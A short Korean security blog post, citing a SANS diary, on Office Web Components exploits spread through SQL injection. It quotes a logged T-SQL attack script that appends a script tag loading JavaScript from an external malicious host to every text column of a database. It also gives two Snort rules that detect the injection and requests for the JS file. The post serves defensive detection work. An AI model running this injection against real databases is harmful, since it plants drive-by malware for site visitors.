OWC exploits used in SQL injection attacks

참조 : http://isc.sans.org/diary.html?storyid=6811

Office Web Components 취약점을 이용하여 exploit공격이 진행되고 있다고 합니다.

웹사이트에 남겨진

로그내용이라고 하네요.


DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(‘update [‘+@T+’] set [‘+@C+’]=rtrim(convert(varchar,[‘+@C+’]))+”<script src=hxxp://f1y.in/j.js></script>”’)FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor



외부에서 삽입공격 시

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:”OWC exploits used in SQL injection attacks”; uricontent:”<script src=http://f1y.in/j.js></script>”; nocase;)

내부에서 js 파일 요청 시

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”OWC exploits used in SQL injection attacks request js file”; uricontent:”/j.js”; nocase; content:”|0d0a|Host|3a20|”; nocase; content:”f1y.in|0d0a|”; nocase; distance:0; within:20;)


About this entry